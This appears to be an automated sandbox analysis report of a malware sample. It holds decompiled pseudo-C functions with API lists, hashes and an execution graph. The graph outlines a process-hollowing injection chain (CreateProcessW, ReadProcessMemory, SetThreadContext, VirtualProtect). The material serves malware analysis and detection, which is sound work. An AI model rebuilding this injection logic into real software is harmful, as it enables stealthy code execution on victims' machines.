                  						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
                  						if( *(_t128 + 0xab04) != 0) {
                  							L14:
                  							return 0;
                  						}
                  						__eflags =  *(_t128 + 0x2af4);
                  						if( *(_t128 + 0x2af4) != 0) {
                  							goto L14;
                  						}
                  						return 1;
                  					}
                  					_v8 =  *((intOrPtr*)(__ecx + 4));
                  					_v12 =  *((intOrPtr*)(__ecx + 0x10));
                  					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
                  					_t139 = _v8;
                  					 *(_t128 + 0xab04) = _t126;
                  					 *__ecx =  *__ecx + _t139;
                  					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
                  					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
                  					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  					_t141 = _v12;
                  					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
                  					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
                  					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
                  					__eflags = _t126;
                  					if(__eflags < 0) {
                  						goto L3;
                  					}
                  					if(__eflags == 0) {
                  						return 1;
                  					}
                  					_t34 = _t128 + 0xab04;
                  					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
                  					__eflags =  *_t34;
                  					goto L8;
                  				}
                  				L3:
                  				_push(0xfffffffd);
                  				goto L23;
                  			}






























                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
                  				void* _v560;
                  				void* _t5;
                  				struct tagPROCESSENTRY32W* _t6;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t12 = __edx;
                  				_t5 = CreateToolhelp32Snapshot(2, 0);
                  				_t13 = _t5;
                  				if(_t13 != 0xffffffff) {
                  					_t6 =  &_v560;
                  					_v560 = 0x22c;
                  					Process32FirstW(_t13, _t6);
                  					while(_t6 != 0 && E00402255( &_v560, _t12) != 0) {
                  						_t6 = Process32NextW(_t13,  &_v560);
                  					}
                  					return CloseHandle(_t13);
                  				}
                  				return _t5;
                  			}









                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				void* _t28;
                  				void* _t44;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t56;
                  				void* _t78;
                  				void* _t84;
                  				void* _t86;
                  				intOrPtr _t89;
                  				intOrPtr _t91;
                  				char* _t92;
                  				void* _t93;
                  
                  				_t46 = _a4;
                  				_v8 = __edx;
                  				E00401503(_t46, 0x808);
                  				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
                  				L00401B09(_t25);
                  				_t28 = E00401A52(0x4122a0, 0x680f9b3);
                  				_t3 = _t46 + 0x400; // 0x4065cd
                  				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
                  				L00401B09(_t28);
                  				_t80 = _v8;
                  				_t56 = 3;
                  				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
                  				_v8 = _t89;
                  				if(_t89 != 0) {
                  					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
                  					_t84 = (GetTickCount() & 0x0000000f) + 4;
                  					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
                  					_t91 = E004014F2(_t14 + _t84);
                  					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
                  					if(_t91 == 0) {
                  						_t85 = _v8;
                  					} else {
                  						E00401E27(_t91, _t84);
                  						_t92 = _t91 + _t84;
                  						_t85 = _v8;
                  						 *_t92 = 0x3d;
                  						_t93 = _t92 + 1;
                  						_t44 = E00401680(_v8, _a4, _t93);
                  						_t18 = _t46 + 0x800; // 0xc885c70e
                  						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
                  					}
                  					E00401532(_t85);
                  				}
                  				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
                  			}

















                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040FC67() {
                  				void* _t9;
                  				int _t10;
                  				void* _t15;
                  				intOrPtr* _t21;
                  				intOrPtr* _t22;
                  
                  				_t22 =  *0x4164e4;
                  				_t21 = 0x4164e4;
                  				if(_t22 == 0) {
                  					return _t9;
                  				}
                  				do {
                  					_t15 = 0;
                  					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
                  						_t15 = 1;
                  					}
                  					if( *((intOrPtr*)(_t22 + 8)) == 3) {
                  						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
                  						if(_t10 == 0) {
                  							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
                  							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
                  							_t10 = CloseHandle( *(_t22 + 0x14));
                  							_t15 = 1;
                  						}
                  					}
                  					if(_t15 == 0) {
                  						_t21 = _t22;
                  					} else {
                  						 *_t21 =  *_t22;
                  						_t10 = E00401532(_t22);
                  					}
                  					_t22 =  *_t21;
                  				} while (_t22 != 0);
                  				return _t10;
                  			}









                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t11;
                  
                  				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t11 = CreateEventW(0, 0, 0,  &_v132);
                  				 *0x414e6c = _t11;
                  				return 0 | _t11 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F292() {
                  				void* _t3;
                  				void* _t7;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  
                  				if( *0x415f4c == 0) {
                  					E0040F227();
                  				} else {
                  					E0040F214();
                  				}
                  				E00401503(0x416840, 0x104);
                  				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
                  				_t19 = _t3;
                  				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
                  				_t10 = _t19;
                  				return HeapFree(GetProcessHeap(), 0, _t10);
                  			}










                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3078599568-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 50%
                  			E0040F227() {
                  				void* _t3;
                  				void* _t8;
                  				void* _t10;
                  				void* _t13;
                  				void* _t14;
                  
                  				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
                  				_t3 = E00401A52(0x412df0, 0x4bf67e71);
                  				_t14 = _t3;
                  				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
                  				_t8 = _t14;
                  				return HeapFree(GetProcessHeap(), 0, _t8);
                  			}









                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {
                  
                  				return RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12);
                  			}



                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
                  
                  				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
                  			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
                  
                  				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
                  			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
                  				intOrPtr _t68;
                  				signed int _t80;
                  				signed int _t83;
                  				signed int _t84;
                  				int* _t85;
                  				void* _t86;
                  
                  				_t83 = _a8;
                  				_t85 = __ecx;
                  				asm("cdq");
                  				_t80 = 3;
                  				 *(__ecx + 8) = _t83;
                  				 *((intOrPtr*)(__ecx)) = 0;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
                  				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
                  				asm("cdq");
                  				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
                  				_t84 = _t83 & 0x00008000;
                  				if(_t84 == 0) {
                  					_t15 = _t85 + 0x29272; // 0x29272
                  					memset(_t15, 0, 0x10000);
                  					_t86 = _t86 + 0xc;
                  				}
                  				 *((intOrPtr*)(_t85 + 0x44)) = 0;
                  				_t17 = _t85 + 0x9273; // 0x9273
                  				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
                  				_t19 = _t85 + 0x9272; // 0x9272
                  				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
                  				_t21 = _t85 + 0x39272; // 0x39272
                  				_t68 = _t21;
                  				 *((intOrPtr*)(_t85 + 0x40)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x48)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x38)) = 8;
                  				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x50)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x18)) = 1;
                  				 *((intOrPtr*)(_t85 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x74)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x78)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x88)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
                  				if(_t84 == 0) {
                  					_t49 = _t85 + 0x90; // 0x90
                  					memset(_t49, 0, 0x8101);
                  					_t86 = _t86 + 0xc;
                  				}
                  				_t50 = _t85 + 0x8192; // 0x8192
                  				memset(_t50, 0, 0x240);
                  				_t51 = _t85 + 0x83d2; // 0x83d2
                  				memset(_t51, 0, 0x40);
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Execution Graph

                  Execution Coverage:12.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3

                  Graph

                  execution_graph 3398 3e123f 3399 3e1271 3398->3399 3402 3e093f 3399->3402 3401 3e127d 3405 3e213f GetPEB 3402->3405 3404 3e0d04 3404->3401 3406 3e2169 3405->3406 3406->3404 3450 3e1a8f 3451 3e1ab0 3450->3451 3452 3e093f GetPEB 3451->3452 3453 3e1abc 3452->3453 3454 3e1b9a 3453->3454 3455 3e1ada 3453->3455 3464 3e1fef 3454->3464 3459 3e12bf 3455->3459 3458 3e1b81 3460 3e093f GetPEB 3459->3460 3463 3e135e 3460->3463 3462 3e139f 3462->3458 3463->3462 3467 3e219f GetPEB 3463->3467 3465 3e12bf 2 API calls 3464->3465 3466 3e1ff9 3465->3466 3466->3458 3468 3e21c9 3467->3468 3468->3463 3519 3e15df 3520 3e1600 3519->3520 3521 3e093f GetPEB 3520->3521 3522 3e160c 3521->3522 3523 3e162a 3522->3523 3524 3e16c0 3522->3524 3525 3e12bf 2 API calls 3523->3525 3528 3e1f6f 3524->3528 3527 3e16a7 3525->3527 3529 3e12bf 2 API calls 3528->3529 3530 3e1f79 3529->3530 3530->3527 3543 3e1bcf 3544 3e1bfc 3543->3544 3551 3e1bf2 3543->3551 3545 3e093f GetPEB 3544->3545 3544->3551 3546 3e1c3e 3545->3546 3547 3e1d5c 3546->3547 3548 3e1c5c 3546->3548 3552 3e200f 3547->3552 3549 3e12bf 2 API calls 3548->3549 3549->3551 3553 3e12bf 2 API calls 3552->3553 3554 3e2019 3553->3554 3554->3551 3436 5a1dc0 3437 5a1ded 3436->3437 3438 5a1000 GetPEB 3437->3438 3439 5a1df9 3438->3439 3440 5a2ad0 IsWow64Process 3439->3440 3441 5a1e0f 3440->3441 3442 5a1ecd 3441->3442 3443 5a1e17 3441->3443 3447 5a2610 3442->3447 3444 5a1980 9 API calls 3443->3444 3446 5a1ead 3444->3446 3448 5a1980 9 API calls 3447->3448 3449 5a261a 3448->3449 3449->3446 3273 3e0000 3275 3e0005 3273->3275 3278 3e002d 3275->3278 3298 3e0467 GetPEB 3278->3298 3281 3e0467 GetPEB 3282 3e0053 3281->3282 3283 3e0467 GetPEB 3282->3283 3284 3e0061 3283->3284 3285 3e0467 GetPEB 3284->3285 3286 3e006d 3285->3286 3287 3e0467 GetPEB 3286->3287 3288 3e007b 3287->3288 3289 3e0467 GetPEB 3288->3289 3292 3e0089 3289->3292 3290 3e00e6 GetNativeSystemInfo 3291 3e0109 VirtualAlloc 3290->3291 3296 3e0029 3290->3296 3293 3e0135 3291->3293 
3292->3290 3292->3296 3293->3293 3294 3e03c3 3293->3294 3295 3e0384 VirtualProtect 3293->3295 3300 5a1900 3294->3300 3295->3293 3295->3296 3299 3e0045 3298->3299 3299->3281 3301 5a1932 3300->3301 3306 5a1000 3301->3306 3303 5a193e 3309 5a1470 3303->3309 3305 5a196c ExitProcess 3305->3296 3325 5a2800 GetPEB 3306->3325 3308 5a13c5 3308->3303 3310 5a1486 3309->3310 3311 5a153d 3310->3311 3312 5a1569 CreateProcessW 3310->3312 3313 5a159e ReadProcessMemory 3310->3313 3315 5a1578 3310->3315 3317 5a2290 10 API calls 3310->3317 3319 5a1820 SetThreadContext 3310->3319 3321 5a1858 CloseHandle 3310->3321 3322 5a1865 CloseHandle 3310->3322 3323 5a1872 CloseHandle 3310->3323 3324 5a20a0 10 API calls 3310->3324 3327 5a2150 3310->3327 3338 5a1ca0 3310->3338 3349 5a1fd0 3310->3349 3312->3310 3312->3315 3313->3310 3313->3315 3315->3311 3360 5a20a0 3315->3360 3317->3310 3319->3310 3319->3315 3321->3310 3322->3310 3323->3310 3324->3310 3326 5a282a 3325->3326 3326->3308 3328 5a2171 3327->3328 3329 5a1000 GetPEB 3328->3329 3330 5a217d 3329->3330 3371 5a2ad0 3330->3371 3332 5a2193 3333 5a225b 3332->3333 3334 5a219b 3332->3334 3335 5a26b0 9 API calls 3333->3335 3336 5a1980 9 API calls 3334->3336 3337 5a2242 3335->3337 3336->3337 3337->3310 3339 5a1cc1 3338->3339 3340 5a1000 GetPEB 3339->3340 3341 5a1ccd 3340->3341 3342 5a2ad0 IsWow64Process 3341->3342 3343 5a1ce3 3342->3343 3344 5a1ceb 3343->3344 3345 5a1d81 3343->3345 3377 5a1980 3344->3377 3374 5a2630 3345->3374 3348 5a1d68 3348->3310 3350 5a1ff1 3349->3350 3351 5a1000 GetPEB 3350->3351 3352 5a1ffd 3351->3352 3353 5a2ad0 IsWow64Process 3352->3353 3354 5a2013 3353->3354 3355 5a2063 3354->3355 3356 5a2017 3354->3356 3392 5a2670 3355->3392 3358 5a1980 9 API calls 3356->3358 3359 5a2058 3358->3359 3359->3310 3361 5a20b8 3360->3361 3362 5a1000 GetPEB 3361->3362 3363 5a20c4 3362->3363 3364 5a2ad0 IsWow64Process 3363->3364 3365 5a20da 3364->3365 3366 5a212a 3365->3366 3367 5a20de 3365->3367 3395 5a2690 3366->3395 3368 5a1980 9 API calls 
